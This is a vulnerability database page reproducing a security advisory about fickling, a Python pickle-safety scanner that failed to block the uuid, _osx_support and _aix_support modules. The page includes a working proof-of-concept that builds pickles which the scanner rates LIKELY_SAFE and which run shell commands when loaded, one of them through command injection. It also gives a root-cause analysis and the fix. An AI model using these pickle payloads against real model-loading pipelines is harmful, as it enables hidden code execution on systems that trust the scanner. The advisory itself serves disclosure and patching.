N/A

CVSS Score

-

CVSS Score

Basic Information

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

GHSA-5hwf-rc88-82xm

GHSA-5hwf-rc88-82xm: Fickling missing RCE-capable modules in UNSAFE_IMPORTS

Assessment

The modules uuid, _osx_support and _aix_support were added to the blocklist of unsafe imports (https://github.com/trailofbits/fickling/commit/ffac3479dbb97a7a1592d85991888562d34dd05b).

Original report

Summary

fickling's UNSAFE_IMPORTS blocklist is missing at least 3 stdlib modules that provide direct arbitrary command execution: uuid, _osx_support, and _aix_support. These modules contain functions that internally call subprocess.Popen() or os.system() with attacker-controlled arguments. A malicious pickle file importing these modules passes both UnsafeImports and NonStandardImports checks.

Affected Versions

fickling <= 0.1.8 (all versions)

Details

Missing Modules

fickling's UNSAFE_IMPORTS (86 modules) does not include:

| Module | RCE Function | Internal Mechanism | Importable On | |--------|-------------|-------------------|---------------| | uuid | _get_command_stdout(cmd, *args) | subprocess.Popen((cmd,) + args, stdout=PIPE, stderr=DEVNULL) | All platforms | | _osx_support | _read_output(cmdstring) | os.system(cmd) via temp file | All platforms | | _osx_support | _find_build_tool(toolname) | Command injection via %s in _read_output("/usr/bin/xcrun -find %s" % toolname) | All platforms | | _aix_support | _read_cmd_output(cmdstring) | os.system(cmd) via temp file | All platforms |

Critical note: Despite the names _osx_support and _aix_support suggesting platform-specific modules, they are importable on ALL platforms. Python includes them in the standard distribution regardless of OS.

Why These Pass fickling

NonStandardImports: These are stdlib modules, so is_std_module() returns True → not flagged
UnsafeImports: Module names not in UNSAFE_IMPORTS → not flagged
OvertlyBadEvals: Function names added to likely_safe_imports (stdlib) → skipped
UnusedVariables: Defeated by BUILD opcode (purposely unhardend)

Proof of Concept (using fickling's opcode API)

from fickling.fickle import (
    Pickled, Proto, Frame, ShortBinUnicode, StackGlobal,
    TupleOne, TupleTwo, Reduce, EmptyDict, SetItem, Build, Stop,
)
from fickling.analysis import check_safety
import struct, pickle

frame_data = b"\x95" + struct.pack("<Q", 60)

# uuid._get_command_stdout — works on ALL platforms
uuid_payload = Pickled([
    Proto(4),
    Frame(struct.pack("<Q", 60), data=frame_data),
    ShortBinUnicode("uuid"),
    ShortBinUnicode("_get_command_stdout"),
    StackGlobal(),
    ShortBinUnicode("echo"),
    ShortBinUnicode("PROOF_OF_CONCEPT"),
    TupleTwo(),
    Reduce(),
    EmptyDict(), ShortBinUnicode("x"), ShortBinUnicode("y"), SetItem(),
    Build(),
    Stop(),
])

# _aix_support._read_cmd_output — works on ALL platforms
aix_payload = Pickled([
    Proto(4),
    Frame(struct.pack("<Q", 60), data=frame_data),
    ShortBinUnicode("_aix_support"),
    ShortBinUnicode("_read_cmd_output"),
    StackGlobal(),
    ShortBinUnicode("echo PROOF_OF_CONCEPT"),
    TupleOne(),
    Reduce(),
    EmptyDict(), ShortBinUnicode("x"), ShortBinUnicode("y"), SetItem(),
    Build(),
    Stop(),
])

# _osx_support._find_build_tool — command injection via %s
osx_payload = Pickled([
    Proto(4),
    Frame(struct.pack("<Q", 60), data=frame_data),
    ShortBinUnicode("_osx_support"),
    ShortBinUnicode("_find_build_tool"),
    StackGlobal(),
    ShortBinUnicode("x; echo INJECTED #"),
    TupleOne(),
    Reduce(),
    EmptyDict(), ShortBinUnicode("x"), ShortBinUnicode("y"), SetItem(),
    Build(),
    Stop(),
])

# All three: fickling reports LIKELY_SAFE
for name, p in [("uuid", uuid_payload), ("aix", aix_payload), ("osx", osx_payload)]:
    result = check_safety(p)
    print(f"{name}: severity={result.severity}, issues={len(result.results)}")
    # Output: severity=Severity.LIKELY_SAFE, issues=0

# All three: pickle.loads() executes the command
pickle.loads(uuid_payload.dumps())  # prints PROOF_OF_CONCEPT

Verified Output

$ python3 poc.py
uuid: severity=Severity.LIKELY_SAFE, issues=0
aix: severity=Severity.LIKELY_SAFE, issues=0
osx: severity=Severity.LIKELY_SAFE, issues=0
PROOF_OF_CONCEPT

Impact

An attacker can craft a pickle file that executes arbitrary system commands while fickling reports it as LIKELY_SAFE. This affects any system relying on fickling for pickle safety validation, including ML model loading pipelines.

Suggested Fix

Add to UNSAFE_IMPORTS in fickling:

"uuid",
"_osx_support",
"_aix_support",

Longer term: Consider an allowlist approach — only permit known-safe stdlib modules rather than blocking known-dangerous ones. The current 86-module blocklist still has gaps because the Python stdlib contains hundreds of modules.

Resources

Python source: Lib/uuid.py lines 156-168 (_get_command_stdout)
Python source: Lib/_osx_support.py lines 35-52 (_read_output), lines 54-68 (_find_build_tool)
Python source: Lib/_aix_support.py lines 14-30 (_read_cmd_output)
fickling source: analysis.py UNSAFE_IMPORTS set

(GitHub Advisory)

Miggo Vulnerability Database

→

GHSA-5hwf-rc88-82xm

GHSA-5hwf-rc88-82xm:

N/A

CVSS Score

-

CVSS Score

Basic Information

Is this CVE running in your environment?

Easily map the attack path and prioritize which CVEs are a threat to your organization

Validate Exposure

Technical Details

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
fickling	pip	<= 0.1.8	0.1.9

Technical Details

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

The vulnerability lies in fickling's failure to block certain Python standard library modules that can be abused for arbitrary code execution. The fickling tool maintains a blocklist of unsafe imports (UNSAFE_IMPORTS), which was found to be incomplete. Specifically, the uuid, _aix_support, and _osx_support modules were missing from this list.

An attacker can craft a pickle object that, when deserialized, imports functions from these modules to execute system commands. Because these modules were not on the blocklist, fickling's check_safety function would incorrectly classify the malicious pickle as LIKELY_SAFE.

The exploitation of this vulnerability involves an application using fickling to vet a pickle, receiving a safe-seeming result, and then proceeding to load the pickle using pickle.loads(). At this point, the functions identified (uuid._get_command_stdout, _aix_support._read_cmd_output, _osx_support._find_build_tool) would be executed, leading to arbitrary code execution on the host system.

The analysis is based on the provided vulnerability description and the patch commit ffac3479dbb97a7a1592d85991888562d34dd05b. The patch rectifies the issue by adding the three aforementioned modules to the UNSAFE_IMPORTS set in fickling/fickle.py. The associated test cases in the patch explicitly demonstrate how these modules could be used to bypass fickling's checks, confirming the vulnerable functions.

Vulnerable functions

uuid._get_command_stdout

Lib/uuid.py

This function from the Python standard library's `uuid` module uses `subprocess.Popen` to execute a command. The vulnerability in `fickling` is that it did not include `uuid` in its `UNSAFE_IMPORTS` blocklist, allowing a malicious pickle to call this function and achieve arbitrary code execution, while `fickling` would incorrectly report the pickle as safe.

_aix_support._read_cmd_output

Lib/_aix_support.py

This function from the Python standard library's `_aix_support` module uses `os.system` to execute a command. The vulnerability in `fickling` is that it did not include `_aix_support` in its `UNSAFE_IMPORTS` blocklist. This allows a malicious pickle to call this function for arbitrary code execution, which `fickling` would fail to detect.

_osx_support._find_build_tool

Lib/_osx_support.py

This function from the Python standard library's `_osx_support` module is vulnerable to command injection because it uses string formatting to construct a command that is then executed via `os.system`. The vulnerability in `fickling` is that it did not block the `_osx_support` module, allowing a malicious pickle to exploit this function for arbitrary code execution while bypassing `fickling`'s safety checks.

Vulnerability Intelligence
Miggo AI

Unlock WAF rules for this CVE

Generate vendor-ready rules for the observed attack patterns, plus reasoning and safe deployment guidance

Get WAF rules

WAF Protection Rules

WAF Rule

W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.

Reasoning

*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.

N/A

-

Basic Information

Basic Information

Concerned about an active attack path?

GHSA-5hwf-rc88-82xm: Fickling missing RCE-capable modules in UNSAFE_IMPORTS

Assessment

Original report

Summary

Affected Versions

Details

Missing Modules

Why These Pass fickling

Proof of Concept (using fickling's opcode API)

Verified Output

Impact

Suggested Fix

Resources

GHSA-5hwf-rc88-82xm:

N/A

-

Basic Information

Basic Information

Is this CVE running in your environment?

Technical Details

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

Vulnerability IntelligenceMiggo AI

Unlock WAF rules for this CVE

WAF Protection Rules

WAF Rule

Reasoning

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

N/A

N/A

Basic Information

Basic Information

Technical Details

GHSA-5hwf-rc88-82xm: Fickling missing RCE-capable modules in UNSAFE_IMPORTS

Assessment

Original report

Summary

Affected Versions

Details

Missing Modules

Why These Pass fickling

Proof of Concept (using fickling's opcode API)

Verified Output

Impact

Suggested Fix

Resources

Vulnerability Intelligence
Miggo AI

Vulnerability Intelligence
Miggo AI

Vulnerability Intelligence
Miggo AI